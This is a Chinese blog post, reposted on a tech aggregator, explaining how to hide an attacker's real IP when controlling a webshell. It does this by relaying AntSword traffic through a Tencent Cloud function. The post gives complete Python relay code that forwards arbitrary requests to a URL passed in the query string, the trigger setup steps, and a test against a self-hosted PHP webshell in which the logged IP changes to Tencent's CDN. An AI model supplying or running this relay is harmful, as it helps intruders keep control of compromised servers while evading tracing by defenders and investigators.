IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 【防溯源】利用腾讯云来隐藏连接 Webshell 的真实 IP -> 正文阅读

[PHP知识库]【防溯源】利用腾讯云来隐藏连接 Webshell 的真实 IP

因为腾讯云函数自带CDN,这样我们可以通过腾讯云函数来转发我们的Webshell请求,从而达到隐藏真实IP的目的

首先来到腾讯云后台找到云函数,我们使用自定义的模版:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GZGa6v1w-1627663757519)(https://note.youdao.com/yws/res/a/WEBRESOURCEcda13ce1dc0a1edf056d01127040f6ea)]

将下面代码复制到index.py中

# -*- coding: utf8 -*-
import requests
import json
def geturl(urlstr):
    jurlstr = json.dumps(urlstr)
    dict_url = json.loads(jurlstr)
    return dict_url['u']
def main_handler(event, context):
    url = geturl(event['queryString'])
    postdata = event['body']
    headers=event['headers']
    resp=requests.post(url,data=postdata,headers=headers,verify=False)
    response={
        "isBase64Encoded": False,
        "statusCode": 200,
        "headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding},
        "body": resp.text
    }
    return response

在这里插入图片描述

部署成功后,点击触发管理->创建触发器

T0R1F2U-1627663757528)(https://note.youdao.com/yws/res/e/WEBRESOURCE3b1808eef89dfb253d76ba655c7958ae)]![

这里需要选择API网关触发

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yV00gcfq-1627663757529)(https://note.youdao.com/yws/res/b/WEBRESOURCEf169f79a80945be966dceb97fb27519b)]

创建成功后

我们就可以在地下看到我们的访问路径

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XRqzOXxe-1627663757532)(https://note.youdao.com/yws/res/a/WEBRESOURCE65ce50dea5658dfdd9a858a4e9edb51a)]

然后在我们的访问路径后面增加?u=webshell一句话木马的地址即可

例如

https://sxxxxxxxxxxxxxxxxx.gz.apigw.tencentcs.com/release/helloworld-1627229247?u=http://xxxx/webshell.php

这里我用docker-compose来临时搭建了一个PHP服务

利用docker-coompose快速搭建PHP:https://github.com/nanoninja/docker-nginx-php-mysql

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ewSUB2Oh-1627663757533)(https://note.youdao.com/yws/res/c/WEBRESOURCE4d5420ff024245d24793def723b156ec)]

然后在对应的文件夹下写一个webshell

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HcY4TrJn-1627663757535)(https://note.youdao.com/yws/res/f/WEBRESOURCEa189b6e94b972059ee1c3f852f6cfc8f)]

然后我们在开启一个终端来实时查看PHP容器的日志信息

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Pl3kX5FT-1627663757537)(https://note.youdao.com/yws/res/9/WEBRESOURCE2b903a40bf91e016f9542488758a4d49)]

这里我通过蚁剑直接连接,可以看到logs显示出了我的真实IP地址

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hGGFh3jU-1627663757539)(https://note.youdao.com/yws/res/5/WEBRESOURCE7ebda8aa1f5cf690c34a342250b4e1d5)]

然后我们在尝试通过腾讯云的云函数来访问我们的webshell

打开蚁剑,url设置为刚刚复制的云函数访问路径?u=木马路径。

https://serxxxxxxxxxxxx.gz.apigw.tencentcs.com/release/forwarded?u=http://vps-ip/index.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ledHZEZq-1627663757540)(https://note.youdao.com/yws/res/a/WEBRESOURCE0f0d78a54c078a95f6e259d28e3160da)]

然后测试连接成功

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-P0zfNfBM-1627663757543)(https://note.youdao.com/yws/res/f/WEBRESOURCE2231fc0a63d1ffa06f0b6a6bff86e3ff)]

然后我们再次访问webshell,可以看到IP已经变为腾讯云CDN的IP

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qnH7OvCz-1627663757546)(https://note.youdao.com/yws/res/c/WEBRESOURCEf54f38d956c3c8d69fa469511f30824c)]

补充:

这里最好在【函数管理】 -> 【函数配置】里面,最好把执行超时时间设置成和蚁剑里面的超时时间一样或者更长

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AyqeCsy0-1627663757548)(https://note.youdao.com/yws/res/b/WEBRESOURCEf25a8a172c5e21d40a81ff17fcbf532b)]

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-08-01 14:18:04  更:2021-08-01 14:18:36 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/5 1:53:55-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码